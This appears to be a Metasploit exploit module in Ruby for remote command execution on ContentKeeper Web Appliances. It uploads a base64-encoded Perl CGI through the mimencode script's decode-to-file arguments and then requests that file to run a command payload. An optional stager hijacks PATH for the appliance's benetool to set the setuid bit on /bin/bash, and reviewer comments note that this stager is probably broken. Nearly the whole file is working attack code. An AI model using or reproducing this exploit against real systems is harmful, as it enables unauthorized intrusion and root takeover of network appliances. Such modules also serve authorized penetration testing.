Path: blob/master/modules/exploits/unix/http/contentkeeperweb_mimencode.rb
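##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ContentKeeper Web Remote Command Execution',
      'Description'    => %q{
        This module exploits the ContentKeeper Web Appliance. Versions prior
        to 125.10 are affected. This module exploits a combination of weaknesses
        to enable remote command execution as the Apache user. By setting
        SkipEscalation to false, this module will attempt to setuid the bash shell.
      },
      'Author'         => [ 'aushack' ],
      'Arch'           => [ ARCH_CMD ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '54551' ],
          [ 'OSVDB', '54552' ],
          [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 1024,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
      'Platform'       => ['unix'],
      'Targets'        =>
        [
          [ 'Automatic', { } ]
        ],
      'DisclosureDate' => '2009-02-25',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(80),
        # Name of the file under /cgi-bin/ck/ that the decoded script is written to
        # and then requested. It is clobbered; the original must be restored by hand.
        OptString.new('OVERWRITE', [ true, "The target file to upload our payload (spamkeeper.dat, bak.txt, formdate.pl etc)", 'spamkeeper.dat']),
        OptBool.new("SkipEscalation", [true, "Specify this to skip the root escalation attempt", false]),
      ])
  end

  # Probe for the mimencode CGI.
  #
  # The original returned CheckCode::Vulnerable whenever requesting
  # /cgi-bin/ck/mimencode with no arguments produced an HTTP 500. A 500 only
  # shows that the CGI exists and ran; it says nothing about the version, so
  # the result is reported as Appears. Anything else, including no response
  # within the 3 second read timeout, is reported Safe as before.
  # The socket is always released, even if the read raises.
  def check
    connect
    begin
      sock.put("GET /cgi-bin/ck/mimencode HTTP/1.0\r\n\r\n")
      banner = sock.get_once(-1, 3)
    ensure
      disconnect
    end

    return Exploit::CheckCode::Appears if banner.to_s.include?('500 Internal')
    Exploit::CheckCode::Safe
  end

  # Two-step exploit: (1) abuse mimencode's `-u -o <file>` arguments to decode
  # a base64 body into a file inside cgi-bin/ck, (2) request that file so Apache
  # executes it as a CGI, which runs the command payload as the Apache user.
  def exploit
    upload_script(build_cgi_script)

    select(nil, nil, nil, 3) # Give the appliance a moment to write the file.
    print_status("Calling payload...")
    connect
    # The original comment notes most files in this directory are root-owned but
    # mode 777, which is why an arbitrary existing file can be overwritten.
    req = "GET /cgi-bin/ck/#{datastore['OVERWRITE']} HTTP/1.1\r\n"
    req << "Host: #{datastore['RHOST']}\r\n"
    sock.put(req + "\r\n\r\n")

    handler
    disconnect
    select(nil, nil, nil, 3) # Wait for session creation.

    return if datastore['SkipEscalation']
    return unless session_created? && datastore['PAYLOAD'] =~ /perl/

    # A session only proves the uploaded CGI ran. Nothing here verifies that the
    # setuid bit actually landed on /bin/bash, so these lines are a prompt for
    # the operator to check (and clean up), not confirmation.
    print_status("Privilege escalation appears to have worked!")
    print_status("/bin/bash is now root setuid! Type 'bash -p' to get root.")
    print_status("Don't forget to clean up afterwards (chmod -s /bin/bash and restore an original copy of the OVERWRITE file).")
  end

  # Build the Perl CGI script that mimencode will write to disk.
  #
  # For perl cmd payloads the payload body is inlined into the script; for any
  # other cmd payload it is handed to the shell through system().
  def build_cgi_script
    exp = "#!/usr/bin/perl\n"
    exp << "print \"Content-type: text/html\\n\\n\";\n\n"
    exp << "use IO::Socket::INET;\n"

    if datastore['PAYLOAD'] =~ /perl/
      unless datastore['SkipEscalation']
        print_status("Attempting to facilitate root escalation...")
        exp << escalation_stager
      end
      # Perl cmd payloads arrive as `perl -MIO -e '<code>'`; drop the interpreter
      # invocation and the quotes so <code> runs inline (IO::Socket::INET is
      # already loaded above). This assumes <code> itself contains no single
      # quotes -- every quote in the payload is removed, not just the outer pair.
      exp << payload.encoded.gsub('perl -MIO -e ', '').gsub('\'', '')
    else
      # The original wrapped the payload in a Perl double-quoted string and only
      # escaped `"`. Perl interpolates `$...`, `@...` and backslash escapes inside
      # double quotes, so a generic command containing e.g. `$HOME` reached the
      # shell mangled. A single-quoted Perl literal passes the bytes through.
      exp << "system(" << perl_single_quote(payload.encoded) << ");\n"
    end

    exp
  end

  # Perl fragment that drops a fake `ps` next to the CGI and then runs the
  # appliance's benetool with `.` first in PATH -- presumably benetool is setuid
  # and invokes ps (or grep, per the original comment) via PATH. Reproduced
  # byte-for-byte from the original module, including the embedded newline.
  #
  # NOTE(review): the `echo` argument is split by the literal "\n" below, so
  # the shell runs `echo` alone and then executes `/bin/chmod u+s /bin/bash > ps`
  # directly instead of writing that command into `ps`; Perl also interpolates
  # `$PATH` inside this double-quoted string (undefined, so the shell sees
  # `PATH=.:`). Whether the intended stager was
  # `echo "/bin/chmod u+s /bin/bash" > ps` should be confirmed against a
  # target before relying on this step.
  def escalation_stager
    " system(\"echo \n/bin/chmod u+s /bin/bash > ps; /bin/chmod o+x ps; PATH=.:$PATH; ./benetool stopall;\"); " # 'grep' works in place of 'ps' too.
  end

  # Encode the script as base64 and POST it to mimencode, whose `-u` (decode)
  # and `-o <file>` arguments are taken straight from the query string.
  #
  # bytesize equals length here because base64 output is ASCII. The trailing
  # CRLFCRLF is sent beyond the declared Content-Length exactly as the original
  # did; the connection is closed immediately afterwards so it is never parsed
  # as a second request.
  def upload_script(script)
    body = Rex::Text.encode_base64(script)

    connect
    begin
      req = "POST /cgi-bin/ck/mimencode?-u+-o+#{datastore['OVERWRITE']} HTTP/1.1\r\n"
      req << "Host: #{datastore['RHOST']}\r\n"
      req << "Content-Length: #{body.bytesize}\r\n\r\n"

      print_status("Uploading payload to target...")
      sock.put(req + body + "\r\n\r\n")
    ensure
      disconnect
    end
  end

  # Wrap str as a Perl single-quoted string literal.
  #
  # Inside '...' Perl recognises only the escapes \\ and \', so escaping those
  # two characters is sufficient; `$`, `@`, backticks and `"` pass through to
  # system() unchanged.
  def perl_single_quote(str)
    "'" + str.gsub(/[\\']/) { |c| "\\#{c}" } + "'"
  end
end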